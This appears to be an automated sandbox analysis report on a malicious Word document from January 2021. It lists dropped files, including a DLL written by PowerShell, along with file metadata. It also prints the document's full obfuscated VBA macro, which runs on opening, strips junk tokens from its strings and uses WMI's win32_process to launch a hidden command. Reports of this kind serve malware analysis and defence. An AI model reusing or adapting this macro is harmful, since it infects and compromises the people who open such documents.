                                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                    Malicious:false
                                                    Preview
                                                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):46
                                                    Entropy (8bit):1.0424600748477153
                                                    Encrypted:false
                                                    SSDEEP:3:/lbWwWl:sZ
                                                    MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                                                    SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                                                    SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                                                    SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                                                    Malicious:false
                                                    Preview: ........................................user.
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):98
                                                    Entropy (8bit):4.451793808565335
                                                    Encrypted:false
                                                    SSDEEP:3:M1uAdcF2xU4oNvPdcF2xU4omX1uAdcF2xU4ov:MsAeojGXeojGAeojy
                                                    MD5:0343436CC573DA8C3B743021EF37BE96
                                                    SHA1:4ECCC69D6286C0A8BE51EC1DEE36B672BAD1D14E
                                                    SHA-256:E6AB1C312E3066F4335F23CEAB9B3991DB18A556A8D94B417BEB791E50FC4E59
                                                    SHA-512:0031D277C85F4E8CE3ED1B0EED12B7BCD640E0A492A73E8F8284919A45ECF68FF1B767052F95DEC343C5FACB8A53B2C3EF4CE056AFDA3D819B352585C4742605
                                                    Malicious:false
                                                    Preview: [doc]..pack-91089 416755919.LNK=0..pack-91089 416755919.LNK=0..[doc]..pack-91089 416755919.LNK=0..
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\pack-91089 416755919.LNK
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Wed Jan 6 15:36:38 2021, length=171008, window=hide
                                                    Category:dropped
                                                    Size (bytes):2128
                                                    Entropy (8bit):4.526634059162851
                                                    Encrypted:false
                                                    SSDEEP:48:82/XT0jFc21mRKWIQh22/XT0jFc21mRKWIQ/:82/XojFc/RKWIQh22/XojFc/RKWIQ/
                                                    MD5:5D56E856A72C045F620942E0590EAF3E
                                                    SHA1:8E96722B93AAD4C3DBCB6C504CFB6B2CA12116CA
                                                    SHA-256:25C6CD1EC2BDD497B7D5815D8A4EC0001EEB18816A7ACEFAFF6D7FA3D240E629
                                                    SHA-512:9C0B7BC0E25E81701451224803B6C1B4A0757CCFC5AC2B78EAC1748B5129C31D25C130155B9CC6C4416B72DC0CB42BAFFFF65F609A897A39947426AF95584E1C
                                                    Malicious:false
                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.431160061181642
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                    MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                    SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                    SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                    SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                    Malicious:false
                                                    Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V7BBYL9UXF0HWT367KEW.temp
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):8016
                                                    Entropy (8bit):3.5890538041827384
                                                    Encrypted:false
                                                    SSDEEP:96:chQCsMqftMqvsqvJCwoSz8hQCsMqftMqvsEHyqvJCworozv1YftJHNf8Ovt+lUVi:cy3oSz8y7Hnorozv6f8OgIu
                                                    MD5:38002FEB116E9220F81A8FDFC7F3D088
                                                    SHA1:27CFCA945B71BDCCCC3CB8490F6E38DEFB15F1CB
                                                    SHA-256:4C4E7918011A4489174B7BF2B65524296B089CD53C49835A4AD9092878B80FB6
                                                    SHA-512:F811E3EB2335C76E7A17292765BE61E0DDC87B53A48B23F71917C4777E4F3C9C120AB6D1D8C6D6075847E6C0D757C4A6939DFE431F673CF64452361BB3BAB6F1
                                                    Malicious:false
                                                    C:\Users\user\Desktop\~$ck-91089 416755919.doc
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.431160061181642
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                    MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                    SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                    SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                    SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                    Malicious:false
                                                    Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                    C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):200625
                                                    Entropy (8bit):7.475412526926351
                                                    Encrypted:false
                                                    SSDEEP:3072:C9zwbpDnn9FfrNyVBYF0n3ajFq4weCp2S2MJdhzybMO8dSySA:C9zsl9FTaBYF0nVp2MJHybR8dS9
                                                    MD5:219F4446B1F7684D99A4E8DE99F12E6A
                                                    SHA1:C932AB01AA4B1540692EC774A801B7A998EE08AB
                                                    SHA-256:45F52C1B6156AA69BE0E215DA63C58CD83E866435264E9298F84DE7B6F8BE1AB
                                                    SHA-512:E21BE56A5231B5C42DDD6A0C5F72F91D6B6BCF330A7ADB7750AE6988121E00124676585798E39DE30153026E708AF4CDC38FA6A57828499B6818DB30D300A484
                                                    Malicious:false
                                                    Preview: <!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

                                                    Static File Info

                                                    General

                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Missouri success Senior Refined Cambridgeshire Refined Rubber Keyboard wireless Markets Concrete hacking, Author: Gabriel Andre, Template: Normal.dotm, Last Saved By: Lisa Gerard, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 5 10:15:00 2021, Last Saved Time/Date: Tue Jan 5 10:15:00 2021, Number of Pages: 1, Number of Words: 2640, Number of Characters: 15049, Security: 8
                                                    Entropy (8bit):6.707687869365253
                                                    TrID:
                                                    • Microsoft Word document (32009/1) 79.99%
                                                    • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                                    File name:pack-91089 416755919.doc
                                                    File size:170237
                                                    MD5:1dc95341c113473f3ac71d3fccdc3512
                                                    SHA1:d07202389ee1458cd8d3f8f000701bc537ec6797
                                                    SHA256:700f121e98f06604e45498c6313d741f4c43582fa41e1cdda3ae1b0e17e1e62c
                                                    SHA512:1778833f10d53e992d33784be9ab872d9eb2b5acdca45438d2b512dc32fbee9b666c42e569bc00525046308a965bed3a6bbf76fe391fb137eb9207491ed10b56
                                                    SSDEEP:3072:4D9ufstRUUKSns8T00JSHUgteMJ8qMD7gC:4D9ufsfgIf0pLC

                                                    File Icon

                                                    Icon Hash:e4eea2aaa4b4b4a4

                                                    Static OLE Info

                                                    General

                                                    Document Type:OLE
                                                    Number of OLE Files:1

                                                    OLE File "pack-91089 416755919.doc"

                                                    Indicators

                                                    Has Summary Info:True
                                                    Application Name:Microsoft Office Word
                                                    Encrypted Document:False
                                                    Contains Word Document Stream:True
                                                    Contains Workbook/Book Stream:False
                                                    Contains PowerPoint Document Stream:False
                                                    Contains Visio Document Stream:False
                                                    Contains ObjectPool Stream:
                                                    Flash Objects Count:
                                                    Contains VBA Macros:True

                                                    Summary

                                                    Code Page:1252
                                                    Title:
                                                    Subject:Missouri success Senior Refined Cambridgeshire Refined Rubber Keyboard wireless Markets Concrete hacking
                                                    Author:Gabriel Andre
                                                    Keywords:
                                                    Comments:
                                                    Template:Normal.dotm
                                                    Last Saved By:Lisa Gerard
                                                    Revision Number:1
                                                    Total Edit Time:0
                                                    Create Time:2021-01-05 10:15:00
                                                    Last Saved Time:2021-01-05 10:15:00
                                                    Number of Pages:1
                                                    Number of Words:2640
                                                    Number of Characters:15049
                                                    Creating Application:Microsoft Office Word
                                                    Security:8

                                                    Document Summary

                                                    Document Code Page:-535
                                                    Number of Lines:125
                                                    Number of Paragraphs:35
                                                    Thumbnail Scaling Desired:False
                                                    Company:
                                                    Contains Dirty Links:False
                                                    Shared Document:False
                                                    Changed Hyperlinks:False
                                                    Application Version:917504

                                                    Streams with VBA

                                                    VBA File Name: A5gd21klfqu9c6rs, Stream Size: 1117
                                                    General
                                                    Stream Path:Macros/VBA/A5gd21klfqu9c6rs
                                                    VBA File Name:A5gd21klfqu9c6rs
                                                    Stream Size:1117

                                                    VBA Code Keywords

                                                    Keyword
                                                    False
                                                    Private
                                                    VB_Exposed
                                                    Attribute
                                                    VB_Creatable
                                                    VB_Name
                                                    Document_open()
                                                    VB_Customizable
                                                    VB_PredeclaredId
                                                    VB_GlobalNameSpace
                                                    VB_Base
                                                    VB_TemplateDerived
                                                    VBA Code
                                                    Attribute VB_Name = "A5gd21klfqu9c6rs"
                                                    Attribute VB_Base = "1Normal.ThisDocument"
                                                    Attribute VB_GlobalNameSpace = False
                                                    Attribute VB_Creatable = False
                                                    Attribute VB_PredeclaredId = True
                                                    Attribute VB_Exposed = True
                                                    Attribute VB_TemplateDerived = True
                                                    Attribute VB_Customizable = True
                                                    Private Sub Document_open()
                                                    G8xesq0b8jlsfrsp
                                                    End Sub
                                                    VBA File Name: Owppnp8hah4xo788, Stream Size: 17915
                                                    General
                                                    Stream Path:Macros/VBA/Owppnp8hah4xo788
                                                    VBA File Name:Owppnp8hah4xo788
                                                    Stream Size:17915

                                                    VBA Code Keywords

                                                    VBA Code
                                                    Attribute VB_Name = "Owppnp8hah4xo788"
                                                    Function G8xesq0b8jlsfrsp()
                                                    On Error Resume Next
                                                    Dhubl2is48jort = "Jsnt2t9fi0a8nnsiaf" + "Bete9x47doew46v"
                                                    sf4 = Zw1k7hcmdl66 + A5gd21klfqu9c6rs.StoryRanges.Item(2 / 2) + Hyii7r76oq89
                                                       GoTo SblcDCC
                                                    Dim pULquU As Object
                                                    Set ibIiBF = diCXTi
                                                    Set pULquU = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                                    Dim SblcDCC As Object
                                                    Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
                                                    SblcDCC.WriteLine "VrVKCjefsIJ"
                                                    SblcDCC.WriteLine "sxbwAfRtWJI"
                                                    SblcDCC.WriteLine "WLXLJnjItPGPZJ"
                                                    Set jbUmDI = NZiApKAp
                                                    SblcDCC.Close
                                                    Set pULquU = Nothing
                                                    Set MznOjBB = vrYYHIDxI
                                                    Set SblcDCC = Nothing
                                                    SblcDCC:
                                                    t3s = "]anw[3" + "p]anw[3"
                                                    K50yjh8o6l7s = "]an" + "w[3ro]anw[3]a" + "nw[3ce]anw[3s]anw[3s]anw[3]anw[3"
                                                       GoTo fNhiCVgGS
                                                    Dim RyDBDK As Object
                                                    Set WTbkNqFa = gzTFLxb
                                                    Set RyDBDK = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                                    Dim fNhiCVgGS As Object
                                                    Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
                                                    fNhiCVgGS.WriteLine "ImJJdfAtdFHCh"
                                                    fNhiCVgGS.WriteLine "deVdMyoREdgzCaJb"
                                                    fNhiCVgGS.WriteLine "XZzpBRpDKuMgsGHIHF"
                                                    Set OlapGi = PjNhJNA
                                                    fNhiCVgGS.Close
                                                    Set RyDBDK = Nothing
                                                    Set yabVbA = oAaNlB
                                                    Set fNhiCVgGS = Nothing
                                                    fNhiCVgGS:
                                                    Brlo236t2rmfu = "]anw[3:w]anw[3]anw[3i" + "n]anw[33]anw[32]anw[3_]anw[3"
                                                       GoTo HCvCmAcHC
                                                    Dim iFTmFHFH As Object
                                                    Set UDSpFHqFJ = sySRJ
                                                    Set iFTmFHFH = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                                    Dim HCvCmAcHC As Object
                                                    Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
                                                    HCvCmAcHC.WriteLine "uTtCAFwHpCGF"
                                                    HCvCmAcHC.WriteLine "lwWhZGEasjsS"
                                                    HCvCmAcHC.WriteLine "MiCjaGqJfPrI"
                                                    Set MmSDYCkJR = UwyYSBsBN
                                                    HCvCmAcHC.Close
                                                    Set iFTmFHFH = Nothing
                                                    Set EISYDDB = tpOgXmm
                                                    Set HCvCmAcHC = Nothing
                                                    HCvCmAcHC:
                                                    Iogna_9cq5gv = "w]anw[3in]anw[3m]an" + "w[3gm]anw[3t]anw[3]anw[3"
                                                       GoTo gEcrV
                                                    Dim RqlOZAHRJ As Object
                                                    Set jsYAGBJAF = MHYlQAD
                                                    Set RqlOZAHRJ = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                                    Dim gEcrV As Object
                                                    Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
                                                    gEcrV.WriteLine "dXFPCSYtSNB"
                                                    gEcrV.WriteLine "KqVyuQQfwTWh"
                                                    gEcrV.WriteLine "qDaYIDDSZQMTaO"
                                                    Set IePCGy = GznGGHyG
                                                    gEcrV.Close
                                                    Set RqlOZAHRJ = Nothing
                                                    Set cwsTFPCH = bbsIZ
                                                    Set gEcrV = Nothing
                                                    gEcrV:
                                                    Fo4b_d8mj9usjgaha = "]anw[3" + "]anw[3" + Mid(Application.Name, 4 + 2, 2 - 1) + "]anw[" + "3]anw[3"
                                                       GoTo ZMdrVHGz
                                                    Dim xsruLB As Object
                                                    Set fiyQuiRBI = swNGWdd
                                                    Set xsruLB = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                                    Dim ZMdrVHGz As Object
                                                    Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
                                                    ZMdrVHGz.WriteLine "MxCpGaGqBgemCAFEJ"
                                                    ZMdrVHGz.WriteLine "hbtzFRJEXyDCXI"
                                                    ZMdrVHGz.WriteLine "zdTcdOoXXUFHJK"
                                                    Set xPBGH = rJEkbLH
                                                    ZMdrVHGz.Close
                                                    Set xsruLB = Nothing
                                                    Set dLRiF = vEBqHrDnD
                                                    Set ZMdrVHGz = Nothing
                                                    ZMdrVHGz:
                                                    K427k3xfk130n18n = Iogna_9cq5gv + Fo4b_d8mj9usjgaha + Brlo236t2rmfu + t3s + K50yjh8o6l7s
                                                       GoTo fDZVKAAc
                                                    Dim tzErBRFe As Object
                                                    Set SeHafBC = tWcKo
                                                    Set tzErBRFe = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                                    Dim fDZVKAAc As Object
                                                    Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
                                                    fDZVKAAc.WriteLine "hKlajOujwgDFAA"
                                                    fDZVKAAc.WriteLine "JMgUDAIEJlgyNBH"
                                                    fDZVKAAc.WriteLine "BUUJYAAIoJvLBLAo"
                                                    Set CHVmaVC = LzxxRHG
                                                    fDZVKAAc.Close
                                                    Set tzErBRFe = Nothing
                                                    Set WlBWDXGD = EKezHIC
                                                    Set fDZVKAAc = Nothing
                                                    fDZVKAAc:
                                                    Lutf6_3d403q9 = Jlda77h_v8nx5(K427k3xfk130n18n)
                                                       GoTo rYbgBh
                                                    Dim hZCth As Object
                                                    Set LQqlBAHD = DpYbmDA
                                                    Set hZCth = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                                    Dim rYbgBh As Object
                                                    Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
                                                    rYbgBh.WriteLine "CVbRCAAhkhmcDG"
                                                    rYbgBh.WriteLine "XrrAwQZPjqB"
                                                    rYbgBh.WriteLine "fxSJajCGlWUEBW"
                                                    Set phIwFD = hDJDJ
                                                    rYbgBh.Close
                                                    Set hZCth = Nothing
                                                    Set PnolTIbAB = dXiwA
                                                    Set rYbgBh = Nothing
                                                    rYbgBh:
                                                    Set Mwzin4vxc1irit = CreateObject(Lutf6_3d403q9)
                                                       GoTo GfRPP
                                                    Dim xLQtMd As Object
                                                    Set uRnkDGJ = hFSyAfFrF
                                                    Set xLQtMd = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                                    Dim GfRPP As Object
                                                    Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
                                                    GfRPP.WriteLine "qiXBsMBsLJGbX"
                                                    GfRPP.WriteLine "mehEFPFHcklgJDDx"
                                                    GfRPP.WriteLine "BndJDkuVYF"
                                                    Set xiFRA = hXxQDACJA
                                                    GfRPP.Close
                                                    Set xLQtMd = Nothing
                                                    Set jENfzNH = xkQqDXCcD
                                                    Set GfRPP = Nothing
                                                    GfRPP:
                                                    Jaaqx1xn5daotw = Mid(sf4, (1 + 4), Len(sf4))
                                                       GoTo sCOIGDtD
                                                    Dim eepvDEaE As Object
                                                    Set jzqBlGW = lBenBDA
                                                    Set eepvDEaE = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                                    Dim sCOIGDtD As Object
                                                    Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
                                                    sCOIGDtD.WriteLine "JTSPCDjykfL"
                                                    sCOIGDtD.WriteLine "bBmgOCvPPojGGC"
                                                    sCOIGDtD.WriteLine "anBQXljzGenE"
                                                    Set tAmQHxlD = UavHTIBHo
                                                    sCOIGDtD.Close
                                                    Set eepvDEaE = Nothing
                                                    Set gphNDVZp = IcAHwPH
                                                    Set sCOIGDtD = Nothing
                                                    sCOIGDtD:
                                                       GoTo fmwdEMADQ
                                                    Dim DkLoDL As Object
                                                    Set plqkuDI = BNmrm
                                                    Set DkLoDL = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                                    Dim fmwdEMADQ As Object
                                                    Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
                                                    fmwdEMADQ.WriteLine "dnUnKFHAkIOdD"
                                                    fmwdEMADQ.WriteLine "ekluIEBJFIgoBcGC"
                                                    fmwdEMADQ.WriteLine "BnxHFzJCGhVHrFIm"
                                                    Set jPJENIo = FLtYjKHC
                                                    fmwdEMADQ.Close
                                                    Set DkLoDL = Nothing
                                                    Set ANzGyzCD = qAUhkIMz
                                                    Set fmwdEMADQ = Nothing
                                                    fmwdEMADQ:
                                                    Mwzin4vxc1irit.Create Jlda77h_v8nx5(Jaaqx1xn5daotw), V2enhc4htwl7z6bh, Thriap3q9rgf3yy9y
                                                       GoTo pkixJADG
                                                    Dim DhnHIY As Object
                                                    Set oQgLUI = zZuzBZGD
                                                    Set DhnHIY = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                                    Dim pkixJADG As Object
                                                    Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
                                                    pkixJADG.WriteLine "fDdPHEjBEnAdZqZFJ"
                                                    pkixJADG.WriteLine "wypNISsWSXthFJCq"
                                                    pkixJADG.WriteLine "LvnHAGHfIhRDBRAF"
                                                    Set ecGmY = OIbfvEEFF
                                                    pkixJADG.Close
                                                    Set DhnHIY = Nothing
                                                    Set EKmLA = eLmLDU
                                                    Set pkixJADG = Nothing
                                                    pkixJADG:
                                                       GoTo KmGOADt
                                                    Dim CFdSBD As Object
                                                    Set nhLeJMLfI = FYVZFEH
                                                    Set CFdSBD = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                                    Dim KmGOADt As Object
                                                    Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
                                                    KmGOADt.WriteLine "DBvMcNtCcMyJDDI"
                                                    KmGOADt.WriteLine "eXpjHFapHaPdRJu"
                                                    KmGOADt.WriteLine "eXObOTlBAITEOIo"
                                                    Set STzBjwICv = hoyzuBGCP
                                                    KmGOADt.Close
                                                    Set CFdSBD = Nothing
                                                    Set ORLICIl = lADFBaJ
                                                    Set KmGOADt = Nothing
                                                    KmGOADt:
                                                    End Function
                                                    Function Jlda77h_v8nx5(Wwsqkhmtfcf3_y)
                                                    On Error Resume Next
                                                       GoTo PbhYVsA
                                                    Dim PcHRGIADo As Object
                                                    Set TXmxvp = SQQWY
                                                    Set PcHRGIADo = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                                    Dim PbhYVsA As Object
                                                    Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
                                                    PbhYVsA.WriteLine "eEWdaDQVJJqTHgF"
                                                    PbhYVsA.WriteLine "OyFBLhlWUnD"
                                                    PbhYVsA.WriteLine "TBKmUCEXTUIGu"
                                                    Set qHKYGHlFA = ddanFDWJf
                                                    PbhYVsA.Close
                                                    Set PcHRGIADo = Nothing
                                                    Set sPkIwu = RhztCF
                                                    Set PbhYVsA = Nothing
                                                    PbhYVsA:
                                                    Gqzsjl136wugk27i9 = Wwsqkhmtfcf3_y
                                                       GoTo NuebA
                                                    Dim sTzDC As Object
                                                    Set GIAKA = kwzjKvZHe
                                                    Set sTzDC = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                                    Dim NuebA As Object
                                                    Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
                                                    NuebA.WriteLine "NeiIGCNWgICn"
                                                    NuebA.WriteLine "EgxfIDVQbJotWhj"
                                                    NuebA.WriteLine "UjBKOEDRIbiWFB"
                                                    Set idbaDIr = inIcjJtaF
                                                    NuebA.Close
                                                    Set sTzDC = Nothing
                                                    Set KXwaABT = zBSWCKmJv
                                                    Set NuebA = Nothing
                                                    NuebA:
                                                    Gnc9qzz9241pnhfi = Hrs2a1p95u19(Gqzsjl136wugk27i9)
                                                       GoTo gxBPJB
                                                    Dim zxgLHJSFW As Object
                                                    Set quDoH = KXTliE
                                                    Set zxgLHJSFW = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                                    Dim gxBPJB As Object
                                                    Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
                                                    gxBPJB.WriteLine "RhnJRGeBNASBQHHGF"
                                                    gxBPJB.WriteLine "WNFUDvHgghFdup"
                                                    gxBPJB.WriteLine "eeVVJBMGlcfXMB"
                                                    Set nleaHR = YZllAeRe
                                                    gxBPJB.Close
                                                    Set zxgLHJSFW = Nothing
                                                    Set mgTNFCq = hjZwD
                                                    Set gxBPJB = Nothing
                                                    gxBPJB:
                                                    Jlda77h_v8nx5 = Gnc9qzz9241pnhfi
                                                       GoTo mgrwfmN
                                                    Dim RjiQHRA As Object
                                                    Set EhCMG = FUyIHBDFz
                                                    Set RjiQHRA = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                                    Dim mgrwfmN As Object
                                                    Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
                                                    mgrwfmN.WriteLine "ptABFEZDmkMVIeD"
                                                    mgrwfmN.WriteLine "vVbvIHcFGEAJJ"
                                                    mgrwfmN.WriteLine "NisSEYrcDlKQUITa"
                                                    Set MNihxICY = AiRdGDAJ
                                                    mgrwfmN.Close
                                                    Set RjiQHRA = Nothing
                                                    Set wTMSLyWFG = AioOpBFE
                                                    Set mgrwfmN = Nothing
                                                    mgrwfmN:
                                                    End Function
                                                    Function Hrs2a1p95u19(Svk60sycz63sk)
                                                    Q491417n8n1 = Pg5minli2d3c9
                                                       GoTo uWZkeMFv
                                                    Dim zDsRaIBGF As Object
                                                    Set ViWsSIH = sreXHFD
                                                    Set zDsRaIBGF = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                                    Dim uWZkeMFv As Object
                                                    Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
                                                    uWZkeMFv.WriteLine "CcDmClHsnCC"
                                                    uWZkeMFv.WriteLine "aqGiHISIbAoabV"
                                                    uWZkeMFv.WriteLine "nJJzFRjEWpRikxCD"
                                                    Set QOrvJEB = eCIzUDyJ
                                                    uWZkeMFv.Close
                                                    Set zDsRaIBGF = Nothing
                                                    Set UskmBJF = yJmmmVIAG
                                                    Set uWZkeMFv = Nothing
                                                    uWZkeMFv:
                                                    Hrs2a1p95u19 = Replace(Svk60sycz63sk, "]a" + "nw[3", Ij2hesgjee57d3s0)
                                                       GoTo iHKuDmaEr
                                                    Dim OMZxxg As Object
                                                    Set drZcHkCm = uVItICICB
                                                    Set OMZxxg = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                                    Dim iHKuDmaEr As Object
                                                    Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
                                                    iHKuDmaEr.WriteLine "syYTHJShrguhzb"
                                                    iHKuDmaEr.WriteLine "TubioGUTLadgXbA"
                                                    iHKuDmaEr.WriteLine "oLweAMoGsqVE"
                                                    Set noebIvSiu = anyPG
                                                    iHKuDmaEr.Close
                                                    Set OMZxxg = Nothing
                                                    Set NXbmIuHX = YVZXECEHD
